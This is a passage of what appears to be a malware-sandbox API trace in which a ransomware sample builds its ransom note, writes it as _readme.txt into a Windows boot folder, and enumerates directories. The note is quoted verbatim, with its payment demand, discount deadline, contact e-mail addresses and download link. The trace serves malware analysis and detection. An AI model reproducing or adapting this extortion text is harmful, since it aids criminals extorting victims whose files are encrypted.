$980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.884] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.884] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.885] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.885] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.885] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.885] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.886] CloseHandle (hObject=0x5cc) returned 1 [0090.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.896] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.896] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.896] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.896] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.896] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.896] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.896] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.897] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.897] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.897] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.897] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.900] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.901] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.901] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.902] HeapFree (in: 